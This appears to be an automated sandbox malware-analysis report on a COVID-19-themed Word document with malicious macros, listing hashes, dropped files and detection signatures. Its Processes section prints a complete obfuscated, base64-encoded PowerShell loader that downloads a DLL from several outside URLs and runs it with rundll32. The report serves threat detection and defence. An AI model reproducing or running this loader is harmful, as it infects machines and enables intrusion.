Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

XP-9743 Medical report COVID-19.doc

Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic, Author: Ambre Vidal, Template: Normal.dotm, Last Saved By: Ethan Vasseur, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 12 17:56:00 2021, Last Saved Time/Date: Tue Jan 12 17:57:00 2021, Number of Pages: 1, Number of Words: 2466, Number of Characters: 14061, Security: 8

initial sample

Details

Filetype:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic, Author: Ambre Vidal, Template: Normal.dotm, Last Saved By: Ethan Vasseur, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 12 17:56:00 2021, Last Saved Time/Date: Tue Jan 12 17:57:00 2021, Number of Pages: 1, Number of Words: 2466, Number of Characters: 14061, Security: 8
Entropy:	6.693119364534795
Filename:	XP-9743 Medical report COVID-19.doc
Filesize:	160861
MD5:	da92c55d4b08367fb79a6bc6ae4da985
SHA1:	8ee3239cfb5dd7d9ddd8e503c8fec19e21ca3c3d
SHA256:	137602cebf7c61fe1bb6647160167813271afbd74a52fcccf03a0ad590a9ef61
SHA512:	9ef0222dd48f94d149e090f17ab465389d489eefd5b4cad14867aa1bb5bbd4ca4af1a0d88ab62d74a90c3dbdb906cabdd823cd8105516a9b19fe642005f17e92
SSDEEP:	3072:EX9ufstRUUKSns8T00JSHUgteMJ8qMD7g8NtP:69ufsfgIf0pL8PP
Preview:	........................>......................................................................................................................................................................................................................................

Signature Hits	Behavior Group	Mitre Attack
Multi AV Scanner detection for submitted file	AV Detection
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation	Data Obfuscation	Scripting Deobfuscate/Decode Files or Information
Document contains an embedded VBA with many randomly named variables	Data Obfuscation
Document contains an embedded VBA macro which executes code when the document is opened / closed	System Summary
Document contains embedded VBA macros	System Summary
Document contains an OLE Word Document stream indicating a Microsoft Word file	System Summary
Document contains summary information with irregular field values	System Summary
Sample is known by Antivirus	System Summary
Document has a 'subject' value indicative of goodware	System Summary

C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll

PE32 executable (DLL) (GUI) Intel 80386, for MS Windows

dropped

Details

File:	C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll
Category:	dropped
Dump:	S93E.dll.5.dr
ID:	dr_6
Target ID:	5
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy:	4.347471014428068
Encrypted:	false
Ssdeep:	3072:aG9ctfNneahaNfjraHoEkApi23X5TKavlyw8W8:aG+Fe17mHoU/3NywH8
Size:	340824
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Machine Learning detection for dropped file	AV Detection
Powershell drops PE file	System Summary	PowerShell
Creates a process in suspended mode (likely to inject code)	HIPS / PFW / Operating System Protection Evasion	Process Injection
Drops PE files	Persistence and Installation Behavior
Runs a DLL by calling functions	System Summary	Rundll32
Spawns processes	System Summary	Process Injection

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp

data

dropped

Details

File:	C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp
Category:	dropped
Dump:	~WRS{4AB68257-B28F-4AE5-86AD-026C320EA73C}.tmp.0.dr
ID:	dr_1
Target ID:	0
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Type:	data
Entropy:	0.05390218305374581
Encrypted:	false
Ssdeep:	3:ol3lYdn:4Wn
Size:	1024
Whitelisted:	false
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Downloads files	Networking	Ingress Tool Transfer

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\XP-9743 Medical report COVID-19.LNK

MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 13 03:30:33 2021, length=161792, window=hide

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\XP-9743 Medical report COVID-19.LNK
Category:	dropped
Dump:	XP-9743 Medical report COVID-19.LNK.0.dr
ID:	dr_3
Target ID:	0
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 13 03:30:33 2021, length=161792, window=hide
Entropy:	4.553735922091283
Encrypted:	false
Ssdeep:	48:8T/XT3In3e/7J0e/kfQh2T/XT3In3e/7J0e/kfQ/:8T/XLIn3eOe8fQh2T/XLIn3eOe8fQ/
Size:	2238
Whitelisted:	false
Reputation:	timeout

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

ASCII text, with CRLF line terminators

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Category:	dropped
Dump:	index.dat.0.dr
ID:	dr_4
Target ID:	0
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Type:	ASCII text, with CRLF line terminators
Entropy:	5.033583001902089
Encrypted:	false
Ssdeep:	3:M1X4WztELQSjmIfFu4olfiWztELQSjmIfFu4omX1X4WztELQSjmIfFu4ov:MDELyIfjufrELyIfjNELyIfjy
Size:	131
Whitelisted:	false
Reputation:	timeout

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Category:	dropped
Dump:	~$Normal.dotm.0.dr
ID:	dr_0
Target ID:	0
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Type:	data
Entropy:	2.431160061181642
Encrypted:	false
Ssdeep:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
Size:	162
Whitelisted:	false
Reputation:	timeout

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFVIB84821J1PYPBOEY5.temp

data

dropped

Details

File:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFVIB84821J1PYPBOEY5.temp
Category:	dropped
Dump:	JFVIB84821J1PYPBOEY5.temp.5.dr
ID:	dr_5
Target ID:	5
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Type:	data
Entropy:	3.586617243298514
Encrypted:	false
Ssdeep:	96:chQCsMqftMqvsqvJCwolz8hQCsMqftMqvsEHyqvJCwor/z1PYftJHyf8Iht+lUVJ:cy3olz8y7Hnor/z1bf8IBIu
Size:	8016
Whitelisted:	false
Reputation:	timeout

C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc

data

dropped

Details

File:	C:\Users\user\Desktop\~$-9743 Medical report COVID-19.doc
Category:	dropped
Dump:	~$-9743 Medical report COVID-19.doc.0.dr
ID:	dr_2
Target ID:	0
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Type:	data
Entropy:	2.431160061181642
Encrypted:	false
Ssdeep:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
Size:	162
Whitelisted:	false
Reputation:	timeout

Signature Hits	Behavior Group	Mitre Attack
Creates files inside the user directory	System Summary	Masquerading

Processes

Path

Cmdline

Malicious

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding

C:\Windows\System32\cmd.exe

cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAAnAHcAZQAnACsAKAAnAHYAdwAnACsAJwBlACcAKQApACkALAAoACcAYQBlACcAKwAnAGYAZgAnACkALAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKQBbADIAXQApAC4AIgBTAGAAUABMAEkAdAAiACgAJABPADUAXwBZACAAKwAgACQASgBiAHoAMwB5AGEAYQAgACsAIAAkAEwAXwAwAEMAKQA7ACQAVgAxADEAVgA9ACgAJwBIACcAKwAoACcAXwA4ACcAKwAnAE0AJwApACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE0AbAA5AHgAdwA3AG0AIABpAG4AIAAkAEoAaQB0AG8AYQAyAGUAKQB7AHQAcgB5AHsAKAAuACgAJwBOAGUAdwAtACcAKwAnAE8AYgBqAGUAYwAnACsAJwB0ACcAKQAgAHMAWQBTAHQAZQBtAC4ATgBFAFQALgB3AEUAQgBDAEwASQBFAG4AVAApAC4AIgBkAG8AVwBgAE4ATABPAGEARABGAEkAYABMAEUAIgAoACQATQBsADkAeAB3ADcAbQAsACAAJABHADYAYQBqAHYAOABkACkAOwAkAE0AMAA2AEsAPQAoACgAJwBBACcAKwAnADUAMQAnACkAKwAnAEIAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEcANgBhAGoAdgA4AGQAKQAuACIAbABgAEUATgBHAHQASAAiACAALQBnAGUAIAAzADAANAA0ADcAKQAgAHsAJgAoACcAcgAnACsAJwB1AG4AJwArACcAZABsAGwAMwAyACcAKQAgACQARwA2AGEAagB2ADgAZAAsACgAKAAnAFMAaAAnACsAJwBvACcAKQArACgAJwB3ACcAKwAnAEQAaQAnACsAJwBhAGwAbwAnACkAKwAnAGcAQQAnACkALgAiAHQAYABvAFMAVAByAGAASQBuAEcAIgAoACkAOwAkAFcANQAyAE0APQAoACgAJwBPADEAJwArACcAOQAnACkAKwAnAFIAJwApADsAYgByAGUAYQBrADsAJABLADgAMQBBAD0AKAAnAEUAJwArACgAJwA3ACcAKwAnADQARAAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA1ADIATgA9ACgAJwBZADcAJwArACcAMgBTACcAKQA=